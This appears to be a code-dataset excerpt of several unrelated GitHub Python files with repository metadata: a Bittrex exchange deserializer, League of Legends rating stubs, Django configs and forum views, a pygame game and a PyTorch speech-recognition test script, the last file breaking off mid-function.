trade=raw_trade,
error=msg,
)
continue
if trade.timestamp < start_ts or trade.timestamp > end_ts:
continue
trades.append(trade)
return trades
def _deserialize_asset_movement(self, raw_data: Dict[str, Any]) -> Optional[AssetMovement]:
"""Processes a single deposit/withdrawal from bittrex and deserializes it
Can log error/warning and return None if something went wrong at deserialization
"""
try:
if 'TxCost' in raw_data:
category = AssetMovementCategory.WITHDRAWAL
date_key = 'Opened'
fee = deserialize_fee(raw_data['TxCost'])
else:
category = AssetMovementCategory.DEPOSIT
date_key = 'LastUpdated'
fee = Fee(ZERO)
timestamp = deserialize_timestamp_from_bittrex_date(raw_data[date_key])
asset = asset_from_bittrex(raw_data['Currency'])
return AssetMovement(
location=Location.BITTREX,
category=category,
timestamp=timestamp,
asset=asset,
amount=deserialize_asset_amount(raw_data['Amount']),
fee_asset=asset,
fee=fee,
link=str(raw_data['TxId']),
)
except UnknownAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex deposit/withdrawal with unknown asset '
f'{e.asset_name}. Ignoring it.',
)
except UnsupportedAsset as e:
self.msg_aggregator.add_warning(
f'Found bittrex deposit/withdrawal with unsupported asset '
f'{e.asset_name}. Ignoring it.',
)
except (DeserializationError, KeyError) as e:
msg = str(e)
if isinstance(e, KeyError):
msg = f'Missing key entry for {msg}.'
self.msg_aggregator.add_error(
f'Unexpected data encountered during deserialization of a bittrex '
f'asset movement. Check logs for details and open a bug report.',
)
log.error(
f'Unexpected data encountered during deserialization of bittrex '
f'asset_movement {raw_data}. Error was: {str(e)}',
)
return None
def query_online_deposits_withdrawals(
self,
start_ts: Timestamp,
end_ts: Timestamp,
) -> List[AssetMovement]:
raw_data = self.api_query('getdeposithistory')
raw_data.extend(self.api_query('getwithdrawalhistory'))
log.debug('bittrex deposit/withdrawal history result', results_num=len(raw_data))
movements = []
for raw_movement in raw_data:
movement = self._deserialize_asset_movement(raw_movement)
if movement and movement.timestamp >= start_ts and movement.timestamp <= end_ts:
movements.append(movement)
return movements
| [
"lefteris@refu.co"
] | lefteris@refu.co |
35c18252ebf33bb45574a6aac18b24612ea99638 | 98efe1aee73bd9fbec640132e6fb2e54ff444904 | /loldib/getratings/models/NA/na_ezreal/na_ezreal_top.py | 9d3af100a74aaa3bca56f5bd36d826514b917710 | [
"Apache-2.0"
] | permissive | koliupy/loldib | be4a1702c26546d6ae1b4a14943a416f73171718 | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | refs/heads/master | 2021-07-04T03:34:43.615423 | 2017-09-21T15:44:10 | 2017-09-21T15:44:10 | 104,359,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,545 | py | from getratings.models.ratings import Ratings
class NA_Ezreal_Top_Aatrox(Ratings):
pass
class NA_Ezreal_Top_Ahri(Ratings):
pass
class NA_Ezreal_Top_Akali(Ratings):
pass
class NA_Ezreal_Top_Alistar(Ratings):
pass
class NA_Ezreal_Top_Amumu(Ratings):
pass
class NA_Ezreal_Top_Anivia(Ratings):
pass
class NA_Ezreal_Top_Annie(Ratings):
pass
class NA_Ezreal_Top_Ashe(Ratings):
pass
class NA_Ezreal_Top_AurelionSol(Ratings):
pass
class NA_Ezreal_Top_Azir(Ratings):
pass
class NA_Ezreal_Top_Bard(Ratings):
pass
class NA_Ezreal_Top_Blitzcrank(Ratings):
pass
class NA_Ezreal_Top_Brand(Ratings):
pass
class NA_Ezreal_Top_Braum(Ratings):
pass
class NA_Ezreal_Top_Caitlyn(Ratings):
pass
class NA_Ezreal_Top_Camille(Ratings):
pass
class NA_Ezreal_Top_Cassiopeia(Ratings):
pass
class NA_Ezreal_Top_Chogath(Ratings):
pass
class NA_Ezreal_Top_Corki(Ratings):
pass
class NA_Ezreal_Top_Darius(Ratings):
pass
class NA_Ezreal_Top_Diana(Ratings):
pass
class NA_Ezreal_Top_Draven(Ratings):
pass
class NA_Ezreal_Top_DrMundo(Ratings):
pass
class NA_Ezreal_Top_Ekko(Ratings):
pass
class NA_Ezreal_Top_Elise(Ratings):
pass
class NA_Ezreal_Top_Evelynn(Ratings):
pass
class NA_Ezreal_Top_Ezreal(Ratings):
pass
class NA_Ezreal_Top_Fiddlesticks(Ratings):
pass
class NA_Ezreal_Top_Fiora(Ratings):
pass
class NA_Ezreal_Top_Fizz(Ratings):
pass
class NA_Ezreal_Top_Galio(Ratings):
pass
class NA_Ezreal_Top_Gangplank(Ratings):
pass
class NA_Ezreal_Top_Garen(Ratings):
pass
class NA_Ezreal_Top_Gnar(Ratings):
pass
class NA_Ezreal_Top_Gragas(Ratings):
pass
class NA_Ezreal_Top_Graves(Ratings):
pass
class NA_Ezreal_Top_Hecarim(Ratings):
pass
class NA_Ezreal_Top_Heimerdinger(Ratings):
pass
class NA_Ezreal_Top_Illaoi(Ratings):
pass
class NA_Ezreal_Top_Irelia(Ratings):
pass
class NA_Ezreal_Top_Ivern(Ratings):
pass
class NA_Ezreal_Top_Janna(Ratings):
pass
class NA_Ezreal_Top_JarvanIV(Ratings):
pass
class NA_Ezreal_Top_Jax(Ratings):
pass
class NA_Ezreal_Top_Jayce(Ratings):
pass
class NA_Ezreal_Top_Jhin(Ratings):
pass
class NA_Ezreal_Top_Jinx(Ratings):
pass
class NA_Ezreal_Top_Kalista(Ratings):
pass
class NA_Ezreal_Top_Karma(Ratings):
pass
class NA_Ezreal_Top_Karthus(Ratings):
pass
class NA_Ezreal_Top_Kassadin(Ratings):
pass
class NA_Ezreal_Top_Katarina(Ratings):
pass
class NA_Ezreal_Top_Kayle(Ratings):
pass
class NA_Ezreal_Top_Kayn(Ratings):
pass
class NA_Ezreal_Top_Kennen(Ratings):
pass
class NA_Ezreal_Top_Khazix(Ratings):
pass
class NA_Ezreal_Top_Kindred(Ratings):
pass
class NA_Ezreal_Top_Kled(Ratings):
pass
class NA_Ezreal_Top_KogMaw(Ratings):
pass
class NA_Ezreal_Top_Leblanc(Ratings):
pass
class NA_Ezreal_Top_LeeSin(Ratings):
pass
class NA_Ezreal_Top_Leona(Ratings):
pass
class NA_Ezreal_Top_Lissandra(Ratings):
pass
class NA_Ezreal_Top_Lucian(Ratings):
pass
class NA_Ezreal_Top_Lulu(Ratings):
pass
class NA_Ezreal_Top_Lux(Ratings):
pass
class NA_Ezreal_Top_Malphite(Ratings):
pass
class NA_Ezreal_Top_Malzahar(Ratings):
pass
class NA_Ezreal_Top_Maokai(Ratings):
pass
class NA_Ezreal_Top_MasterYi(Ratings):
pass
class NA_Ezreal_Top_MissFortune(Ratings):
pass
class NA_Ezreal_Top_MonkeyKing(Ratings):
pass
class NA_Ezreal_Top_Mordekaiser(Ratings):
pass
class NA_Ezreal_Top_Morgana(Ratings):
pass
class NA_Ezreal_Top_Nami(Ratings):
pass
class NA_Ezreal_Top_Nasus(Ratings):
pass
class NA_Ezreal_Top_Nautilus(Ratings):
pass
class NA_Ezreal_Top_Nidalee(Ratings):
pass
class NA_Ezreal_Top_Nocturne(Ratings):
pass
class NA_Ezreal_Top_Nunu(Ratings):
pass
class NA_Ezreal_Top_Olaf(Ratings):
pass
class NA_Ezreal_Top_Orianna(Ratings):
pass
class NA_Ezreal_Top_Ornn(Ratings):
pass
class NA_Ezreal_Top_Pantheon(Ratings):
pass
class NA_Ezreal_Top_Poppy(Ratings):
pass
class NA_Ezreal_Top_Quinn(Ratings):
pass
class NA_Ezreal_Top_Rakan(Ratings):
pass
class NA_Ezreal_Top_Rammus(Ratings):
pass
class NA_Ezreal_Top_RekSai(Ratings):
pass
class NA_Ezreal_Top_Renekton(Ratings):
pass
class NA_Ezreal_Top_Rengar(Ratings):
pass
class NA_Ezreal_Top_Riven(Ratings):
pass
class NA_Ezreal_Top_Rumble(Ratings):
pass
class NA_Ezreal_Top_Ryze(Ratings):
pass
class NA_Ezreal_Top_Sejuani(Ratings):
pass
class NA_Ezreal_Top_Shaco(Ratings):
pass
class NA_Ezreal_Top_Shen(Ratings):
pass
class NA_Ezreal_Top_Shyvana(Ratings):
pass
class NA_Ezreal_Top_Singed(Ratings):
pass
class NA_Ezreal_Top_Sion(Ratings):
pass
class NA_Ezreal_Top_Sivir(Ratings):
pass
class NA_Ezreal_Top_Skarner(Ratings):
pass
class NA_Ezreal_Top_Sona(Ratings):
pass
class NA_Ezreal_Top_Soraka(Ratings):
pass
class NA_Ezreal_Top_Swain(Ratings):
pass
class NA_Ezreal_Top_Syndra(Ratings):
pass
class NA_Ezreal_Top_TahmKench(Ratings):
pass
class NA_Ezreal_Top_Taliyah(Ratings):
pass
class NA_Ezreal_Top_Talon(Ratings):
pass
class NA_Ezreal_Top_Taric(Ratings):
pass
class NA_Ezreal_Top_Teemo(Ratings):
pass
class NA_Ezreal_Top_Thresh(Ratings):
pass
class NA_Ezreal_Top_Tristana(Ratings):
pass
class NA_Ezreal_Top_Trundle(Ratings):
pass
class NA_Ezreal_Top_Tryndamere(Ratings):
pass
class NA_Ezreal_Top_TwistedFate(Ratings):
pass
class NA_Ezreal_Top_Twitch(Ratings):
pass
class NA_Ezreal_Top_Udyr(Ratings):
pass
class NA_Ezreal_Top_Urgot(Ratings):
pass
class NA_Ezreal_Top_Varus(Ratings):
pass
class NA_Ezreal_Top_Vayne(Ratings):
pass
class NA_Ezreal_Top_Veigar(Ratings):
pass
class NA_Ezreal_Top_Velkoz(Ratings):
pass
class NA_Ezreal_Top_Vi(Ratings):
pass
class NA_Ezreal_Top_Viktor(Ratings):
pass
class NA_Ezreal_Top_Vladimir(Ratings):
pass
class NA_Ezreal_Top_Volibear(Ratings):
pass
class NA_Ezreal_Top_Warwick(Ratings):
pass
class NA_Ezreal_Top_Xayah(Ratings):
pass
class NA_Ezreal_Top_Xerath(Ratings):
pass
class NA_Ezreal_Top_XinZhao(Ratings):
pass
class NA_Ezreal_Top_Yasuo(Ratings):
pass
class NA_Ezreal_Top_Yorick(Ratings):
pass
class NA_Ezreal_Top_Zac(Ratings):
pass
class NA_Ezreal_Top_Zed(Ratings):
pass
class NA_Ezreal_Top_Ziggs(Ratings):
pass
class NA_Ezreal_Top_Zilean(Ratings):
pass
class NA_Ezreal_Top_Zyra(Ratings):
pass
| [
"noreply@github.com"
] | koliupy.noreply@github.com |
fa6b15f117b246dbe03e912ac23fd06353222949 | a94e5ef77b7510b34885de07a4a9779abd46f804 | /mishipay_social_app/mishipay_social_app/wsgi.py | a695684996139bbc438e87c07ce777c75b9f714d | [] | no_license | shubham-kumar/mishipay | e05714508e7c9b5a0e5d8eb82b0d7f7e05654ed2 | 86beb0532637d4b18b326d1d1d2af55f4ce4e3ad | refs/heads/master | 2020-08-21T14:37:18.692527 | 2019-10-19T09:35:56 | 2019-10-19T09:35:56 | 216,181,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """
WSGI config for mishipay_social_app project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mishipay_social_app.settings')
application = get_wsgi_application()
| [
"shubham.kumar@autodesk.com"
] | shubham.kumar@autodesk.com |
c66f64e3cdef0df7c0c6fea5459b75f5b42961cf | c17374a533fd7f21be10ef2077e261849ed87c7e | /electoraid_cms/urls.py | e8e35769590ed4bab0662190aff56da33362675d | [] | no_license | electoraid/electoraid-cms | cf8a6f9ebf6951625c202ff8b9e2c3ad72f528ae | 8a11b4b7b6d9eadf283af0725a57710eddffe216 | refs/heads/master | 2022-12-12T13:47:02.793891 | 2019-12-04T02:25:09 | 2019-12-04T02:25:09 | 223,650,774 | 0 | 0 | null | 2022-12-08T03:15:57 | 2019-11-23T20:45:38 | Python | UTF-8 | Python | false | false | 967 | py | """electoraid_cms URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from baton.autodiscover import admin
from django.urls import include, path
from django.views.generic.base import RedirectView
from django.views.decorators.csrf import csrf_exempt
urlpatterns = [
path('admin/', admin.site.urls),
path('baton/', include('baton.urls')),
path('', RedirectView.as_view(url='/admin')),
]
| [
"davideads@gmail.com"
] | davideads@gmail.com |
48c6437c06998d4e83c780d0c0e2e77800e63df4 | a259121f6b1ea79bd14ba969145093189d78089a | /pygame_project/collision.py | 311d6eabd09e87c797489816cd7e8045123fec45 | [] | no_license | onerain92/makingClassicGame | acb7b97f1548bbf35135913c7dfaa93f1059a32c | 49ee59a27bea9d8244d927687785c8e5a19c3022 | refs/heads/main | 2022-12-24T22:04:34.749553 | 2020-10-10T04:02:55 | 2020-10-10T04:02:55 | 301,774,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,140 | py | import pygame
import os
######################################################################
# 기본 초기화
pygame.init()
screen_width = 640
screen_height = 480
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("공뿌시기")
clock = pygame.time.Clock()
######################################################################
# 1. 사용자 게임 초기화(배경 화면, 게임 이미지, 좌표, 속도, 폰트 등)
current_path = os.path.dirname(__file__) # 현재 파일의 위치 반환
image_path = os.path.join(current_path, "images") # images 폴더 위치 반환
# 배경 만들기
background = pygame.image.load(os.path.join(image_path, "background.png"))
# 스테이지 만들기
stage = pygame.image.load(os.path.join(image_path, "stage.png"))
stage_size = stage.get_rect().size
stage_height = stage_size[1] # 스테이지의 높이 위에 캐릭터를 두기 위해
# 캐릭터 만들기
character = pygame.image.load(os.path.join(image_path, "character.png"))
character_size = character.get_rect().size
character_width = character_size[0] # 스테이지의 높이 위에 캐릭터를 두기 위해
character_height = character_size[1] # 스테이지의 높이 위에 캐릭터를 두기 위해
character_x_pos = (screen_width / 2) - (character_width / 2)
character_y_pos = screen_height - character_height - stage_height
# 캐릭터 이동 방향
character_to_x = 0
# 캐릭터 이동 속도
character_speed = 5
# 무기 만들기
weapon = pygame.image.load(os.path.join(image_path, "weapon.png"))
weapon_size = weapon.get_rect().size
weapon_width = weapon_size[0]
# 무기는 한 번에 여러발 발사 가능
weapons = []
# 무기 이동 속도
weapon_speed = 10
# 공 만들기( 4개 크기에 대해 따로 처리 )
ball_images = [
pygame.image.load(os.path.join(image_path, "balloon1.png")),
pygame.image.load(os.path.join(image_path, "balloon2.png")),
pygame.image.load(os.path.join(image_path, "balloon3.png")),
pygame.image.load(os.path.join(image_path, "balloon4.png"))
]
# 공 크기에 따른 최초 스피드
ball_speed_y = [-18, -15, -12, -9] # index 0, 1, 2, 3에 해당하는 값
# 공들
balls = []
# 최초 발생하는 큰 공 추가
balls.append({
"pos_x": 50, # 공의 x 좌표
"pos_y": 50, # 공의 y 좌표
"img_idx": 0, # 공의 이미지 인덱스
"to_x": 3, # 공의 x축 이동방향, -3이면 왼쪽으로, 3이면 오른쪽으로 이동
"to_y": -6, # 공의y축 이동방향
"init_spd_y": ball_speed_y[0] # y 최초 속도
})
# 사라질 무기, 공 정보 저장 변수
weapon_to_remove = -1
ball_to_remove = -1
running = True
while running:
dt = clock.tick(30)
# 2. 이벤트 처리 (키보드, 마우스 등)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT: # 캐릭터를 왼쪽으로
character_to_x -= character_speed
elif event.key == pygame.K_RIGHT: # 캐릭터를 왼쪽으로
character_to_x += character_speed
elif event.key == pygame.K_SPACE: # 캐릭터를 왼쪽으로
weapon_x_pos = character_x_pos + \
(character_width / 2) - (weapon_width / 2)
weapon_y_pos = character_y_pos
weapons.append([weapon_x_pos, weapon_y_pos])
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT: # 캐릭터를 왼쪽으로
character_to_x = 0
# 3. 게임 캐릭터 위치 정의
character_x_pos += character_to_x
if character_x_pos < 0:
character_x_pos = 0
elif character_x_pos > screen_width - character_width:
character_x_pos = screen_width - character_width
# 무기 위치 조정
weapons = [[w[0], w[1] - weapon_speed] for w in weapons] # 무기 위치를 위로
# 천장에 닿은 무기 없애기
weapons = [[w[0], w[1]] for w in weapons if w[1] > 0]
# 공 위치 정의
for ball_idx, ball_val in enumerate(balls):
ball_pos_x = ball_val["pos_x"]
ball_pos_y = ball_val["pos_y"]
ball_img_idx = ball_val["img_idx"]
ball_size = ball_images[ball_img_idx].get_rect().size
ball_width = ball_size[0]
ball_height = ball_size[1]
# 가로벽에 닿았을 때 공 이동 위치 변경( 튕겨 나오는 효과 )
if ball_pos_x < 0 or ball_pos_x > screen_width - ball_width:
ball_val["to_x"] = ball_val["to_x"] * -1
# 세로 위치
# 스테이지에 튕겨서 올라가는 처리
if ball_pos_y >= screen_height - stage_height - ball_height:
ball_val["to_y"] = ball_val["init_spd_y"]
else: # 그 외의 모든 경우에는 속도를 증가
ball_val["to_y"] += 0.5
ball_val["pos_x"] += ball_val["to_x"]
ball_val["pos_y"] += ball_val["to_y"]
# 4. 충돌 처리
# 캐릭터 rect 정보 업데이트
character_rect = character.get_rect()
character_rect.left = character_x_pos
character_rect.top = character_y_pos
for ball_idx, ball_val in enumerate(balls):
ball_pos_x = ball_val["pos_x"]
ball_pos_y = ball_val["pos_y"]
ball_img_idx = ball_val["img_idx"]
# 공 rect 정보 업데이트
ball_rect = ball_images[ball_img_idx].get_rect()
ball_rect.left = ball_pos_x
ball_rect.top = ball_pos_y
# 공과 캐릭터 충돌 처리
if character_rect.colliderect(ball_rect):
running = False
break
# 공과 무기들 충돌 처리
for weapon_idx, weapon_val in enumerate(weapons):
weapon_pos_x = weapon_val[0]
weapon_pos_y = weapon_val[1]
# 무기 rect 정보 업데이트
weapon_rect = weapon.get_rect()
weapon_rect.left = weapon_pos_x
weapon_rect.top = weapon_pos_y
# 충돌 체크
if weapon_rect.colliderect(ball_rect):
weapon_to_remove = weapon_idx # 해당 무기 없애기 위한 값 설정
ball_to_remove = ball_idx # 해당 공 없애기 위한 값 설정
break
# 충돌된 공 or 무기 없애기
if ball_to_remove > -1:
del balls[ball_to_remove]
ball_to_remove = -1
if weapon_to_remove > -1:
del weapons[weapon_to_remove]
weapon_to_remove = -1
# 5. 화면에 그리기
screen.blit(background, (0, 0))
for weapon_x_pos, weapon_y_pos in weapons:
screen.blit(weapon, (weapon_x_pos, weapon_y_pos))
for idx, val in enumerate(balls):
ball_pos_x = val["pos_x"]
ball_pos_y = val["pos_y"]
ball_img_idx = val["img_idx"]
screen.blit(ball_images[ball_img_idx], (ball_pos_x, ball_pos_y))
screen.blit(stage, (0, screen_height - stage_height))
screen.blit(character, (character_x_pos, character_y_pos))
pygame.display.update()
pygame.quit()
| [
"ted@mobidoo.co.kr"
] | ted@mobidoo.co.kr |
b6e455cb0f1da3debf57a57e34f1365a6e7625f6 | 7a78dc9efe7be5176407e3791e8626fd6e5720c4 | /test.py | c6f792a2d76a7ccad6e2c05dd0c2f1580c3e54e8 | [
"MIT"
] | permissive | JerryJack121/Speech_Recognition-PyTorch | 1734ed4b8e6587de5555ec56280f4df6954f199d | da7ba30b9905e8e7a8341fdb14250650a060812b | refs/heads/main | 2023-02-20T00:53:17.963023 | 2021-01-23T09:53:00 | 2021-01-23T09:53:00 | 331,284,318 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,397 | py | import torch
import torchaudio
import torch.nn as nn
from torch.utils import data
import torch.optim as optim
from nets.model import SpeechRecognitionModel
from comet_ml import Experiment
from utils.processing import TextTransform, data_processing, GreedyDecoder
import os
import torch.nn.functional as F
from utils.wer import levenshtein_distance as wer
from tqdm import tqdm
import time
import math
from audio_dataloader import Aduio_DataLoader
import matplotlib.pyplot as plt
import pandas as pd
if torch.cuda.is_available():
device = torch.device('cuda')
torch.backends.cudnn.benchmark = True
torch.cuda.empty_cache()
else:
device = torch.device('cpu')
hparams = {
"n_cnn_layers": 3,
"n_rnn_layers": 7,
"rnn_dim": 512*2,
"n_class": 29,
"n_feats": 128,
"stride": 2,
"dropout": 0,
"batch_size": 1,
}
model = SpeechRecognitionModel(hparams['n_cnn_layers'],
hparams['n_rnn_layers'], hparams['rnn_dim'],
hparams['n_class'], hparams['n_feats'],
hparams['stride'],
hparams['dropout']).to(device)
model.load_state_dict(
torch.load(r'./weights/transfer_rnn7-rnndim1024-drop0.1/epoch4-val_loss0.0002-avg_wer0.0365.pth'))
test_dataset = Aduio_DataLoader(
r'D:\dataset\ntut-ml-2020-taiwanese-e2e\test-shuf')
test_loader = data.DataLoader(dataset=test_dataset,
batch_size=hparams['batch_size'],
shuffle=False,
collate_fn=lambda x: data_processing(x, 'test'),
num_workers=0,
pin_memory=True)
test_data_len = len(test_loader.dataset)
test_epoch_size = math.ceil(test_data_len / hparams['batch_size'])
start_time = time.time()
file_list, pred_list = [], []
with tqdm(total=test_epoch_size, desc='test', postfix=dict,
mininterval=0.3) as pbar:
with torch.no_grad():
for I, _data in enumerate(test_loader):
spectrograms, labels, input_lengths, label_lengths, filename = _data
spectrograms, labels = spectrograms.to(device), labels.to(device)
output = model(spectrograms) # (batch, time, n_class)
output = F.log_softmax(output, dim=2)
output = output.transpose(0, 1) # (time, batch, n_class)
decoded_preds, decoded_targets = GreedyDecoder(
output.transpose(0, 1),
labels.cpu().numpy().astype(int), label_lengths)
pred = decoded_preds[0].replace("'", " ").strip() #刪除前後的空格
file_list.append(filename)
pred_list.append(pred)
waste_time = time.time() - start_time
pbar.set_postfix(**{'step/s': waste_time})
pbar.update(1)
id_path = r'D:\dataset\ntut-ml-2020-taiwanese-e2e\sample.csv'
save_path = r'D:\dataset\ntut-ml-2020-taiwanese-e2e\results\test.csv'
dictionary = {'id': file_list[:], 'text': pred_list[:]}
final_file_list, final_pred_list = [], []
for i in range(len(file_list)):
final_file_list.append(i + 1)
location = file_list.index(str(i + 1))
final_pred_list.append(str(dictionary.get('text')[location]))
my_submission = pd.DataFrame({
'id': final_file_list[:],
'text': final_pred_list[:]
})
my_submission.to_csv(save_path, index=False) | [
"73692359+JerryJack121@users.noreply.github.com"
] | 73692359+JerryJack121@users.noreply.github.com |
783e3e6e5e997ff2fe9c9d118183bb1e9b3cdac8 | 13d57862b1b126fbeb432b687713d5f7f2aad4ef | /cms/templates/Admin/index.py | 00cde0445b4d408612b57b53c1da6ae1f52f8de3 | [
"MIT"
] | permissive | angeal185/python-flask-material-design-cms | c71d415aaec616c7990ba96553de46d8c3d331db | 32c6251792bca75aebe231ab08b6de7ea1936998 | refs/heads/master | 2021-01-22T09:03:58.409067 | 2017-02-14T09:43:08 | 2017-02-14T09:43:08 | 81,928,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | {%- extends "Admin/base.py" -%}
{%- block pagewrapper -%}
<div id="page-wrapper">
<div class="container-fluid">
<div class="row">
<div class="col-lg-12">
<h1 class="page-header">Dashboard</h1>
</div>
</div>
</div>
</div>
{%- endblock -%}
| [
"noreply@github.com"
] | angeal185.noreply@github.com |
901fc3814d46e3c57026538f8016d37ea74efc9a | 178cfc4f54ed426401412e2f240ba39e105137f7 | /ex38.py | 1d1f19dd73dbe051346cb518048930b3e935dccb | [] | no_license | gsera/pythonhw | eccdd7ed8d752e02e5d9547257d77eb3f549b047 | f5ae358cc27913b22f349af6ef90ab269b795257 | refs/heads/master | 2021-01-10T10:54:33.985852 | 2016-03-06T06:18:50 | 2016-03-06T06:18:50 | 51,489,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
print "Wait there are not 10 things in that list. Let's fix that."
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee", "Corn", "Banana", "Girl", "Boy"]
while len(stuff) != 10:
next_one = more_stuff.pop()
print "Adding: ", next_one
stuff.append(next_one)
print "There are %d items now." % len(stuff)
print "There we go: ", stuff
print "Left's do some things with stuff."
print stuff[1]
print stuff[-1] # whoa! fancy
print stuff.pop()
print ' '.join(stuff) # what? cool!
print '#'.join(stuff[3:5]) # super stellar!
| [
"gsera@vatava.com"
] | gsera@vatava.com |
41cead60e323b3789fede1a5f530346dfe3c0e19 | 0192f085fa93ae282a7e3e4b109a5484ec2793ad | /get-readings.py | b5af21d614d28887feba242e580ed856e8245277 | [] | no_license | circuitFlower/io | a8b27703bccda240a498e43135e74116a7006724 | c12b2886522c3a65807f38f46d11f17dd005263e | refs/heads/master | 2016-09-05T16:27:44.490490 | 2015-09-22T00:31:31 | 2015-09-22T00:31:31 | 42,901,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | import socket
from time import sleep
import os
import sqlite3 as lite
#######################
ipaddr = "192.168.1.73" #### CHANGE ME TO ESP IP ADDRESS ON USER WIFI NETWORK ####
#######################
os.system("touch test.db")
con = lite.connect("test.db")
while True:
motion = raw_input("Table Name: ")
with con:
cur = con.cursor()
cmd = "DROP TABLE IF EXISTS " + str(motion)
cur.execute(str(cmd))
cmd = "CREATE TABLE " + str(motion) + "(x INT, y INT, z INT)"
cur.execute(str(cmd))
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipaddr, 80))
sockdata = ""
sock.sendall("hello\r")
sockdata = sock.recv(200).strip()
temp = sockdata.splitlines(0)
for b in range(len(temp)):
temp1 = temp[b]
x1 = temp1.find(",")
y1 = temp1.find(",", x1+1)
z1 = temp1.find(",", y1+1)
x = temp1[:x1]
y = temp1[x1+1:y1]
z = temp1[y1+1:]
print x, y, z
with con:
cmd = "INSERT INTO " + motion + " VALUES(?, ?, ?)"
cur.execute(str(cmd), (int(x), int(y), int(z)))
con.commit()
sock.close()
except KeyboardInterrupt:
print "\nStopping..."
break
print motion + " Complete!"
q = raw_input("Create another table? (y/n): ")
if (q == "n"):
print "Database saved as test.db in current directory"
con.close()
quit()
| [
"aervin@mac-aervin.local"
] | aervin@mac-aervin.local |
e429fcfe0ed1145b8e532cc0d35d416c34e5d342 | f35bf9ff7405c179289f049fad4396198b4a0ef8 | /Leetcode_30DaysChallenge/3_7_LeftMostColumtWithAtleast1.py | d46c3c7a45194e870424eb9cd84f76199cfa9c68 | [] | no_license | proRamLOGO/Competitive_Programming | d19fc542e9f10faba9a23f4ef3335f367ccc125a | 06e59ba95c3804cae10120ac7eda6482c3d72088 | refs/heads/master | 2023-01-03T07:27:25.960619 | 2020-10-29T19:15:53 | 2020-10-29T19:15:53 | 151,049,005 | 0 | 7 | null | 2020-10-29T19:15:54 | 2018-10-01T07:05:55 | C++ | UTF-8 | Python | false | false | 746 | py | # """
# This is BinaryMatrix's API interface.
# You should not implement it, or speculate about its implementation
# """
#class BinaryMatrix(object):
# def get(self, x: int, y: int) -> int:
# def dimensions(self) -> list[]:
class Solution:
def leftMostColumnWithOne(self, bm: 'BinaryMatrix') -> int:
n,m = bm.dimensions()
if ( n==0 or m==0 ) :
return -1 ;
x,y = 0,m-1
ans = m
while ( x < n and y > -1 ) :
if ( bm.get(x,y) == 1 ) :
ans = min(ans,y)
if ( y>0 and bm.get(x,y-1) == 1 ) :
y -= 1
continue
x += 1
if (ans==m) :
ans = -1
return ans
| [
"kapilgupta547@outlook.com"
] | kapilgupta547@outlook.com |
3bf18e8a7b79f3d28756f1a2066e6a137483bf68 | 75b4363d64e996ce21c0fc4832f5b607ab871e58 | /advanced/views.py | 6deca98fe66598bbf85a5bbb00ce0842ac461493 | [] | no_license | 7990satyam200/quoraclone | 2c68e328d0298416b794340a1ff66327e14b7335 | e116089e6e44fed81a0157ca03fbffa8e08498f3 | refs/heads/master | 2020-03-24T00:54:56.242387 | 2018-07-25T14:49:05 | 2018-07-25T14:49:05 | 142,313,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,901 | py | from django.shortcuts import render, get_object_or_404, redirect
from django.http import HttpResponse
from .models import Board, Topic, Post
from django.views.generic import TemplateView
from django.contrib.auth.models import User
from .models import Board, Topic, Post
from .forms import newTopicForm, PostForm
from django.contrib.auth.decorators import login_required
from django.views.generic import UpdateView
from django.utils import timezone
# Create your views here.
def home(request):
boards = Board.objects.all()
return render(request, 'home.html', {'boards':boards})
# class home(TemplateView):
# model =Board
# template_name = 'home.html'
def board_topic(request, pk):
board = Board.objects.get(pk=pk)
return render(request, 'topics.html', {'board':board})
# def new_topic(request, pk):
# board = get_object_or_404(Board, pk=pk)
# if request.method == 'POST':
# subject = request.POST['subject']
# message = request.POST['message']
# user = User.objects.first()
# topic = Topic.objects.create(subject=subject, board=board, starter=user)
# post = Post.objects.create(message = message, topic=topic, created_by= user)
# return redirect('board_topic', pk=board.pk)
# return render(request, 'new_topic.html', {'board':board})
@login_required
def new_topic(request, pk):
board = get_object_or_404(Board, pk=pk)
# user = User.objects.first() # TODO: get the currently logged in user
if request.method == 'POST':
form = newTopicForm(request.POST)
if form.is_valid():
topic = form.save(commit=False)
topic.board = board
topic.starter = request.user
topic.save()
post = Post.objects.create(
message=form.cleaned_data.get('message'),
topic=topic,
created_by=request.user
)
return redirect('board_topic', pk=pk) # TODO: redirect to the created topic page
else:
form = newTopicForm()
return render(request, 'new_topic.html', {'board': board, 'form': form})
def topic_posts(request, pk, topic_pk):
topic = get_object_or_404(Topic, board__pk=pk, pk=topic_pk)
return render(request, 'topic_posts.html', {'topic': topic})
@login_required
def reply_topic(request, pk, topic_pk):
board = Board.objects.get(pk=pk)
topic = get_object_or_404(Topic, board__pk=pk, pk= topic_pk)
if request.method =='POST':
form = PostForm(request.POST)
if form.is_valid():
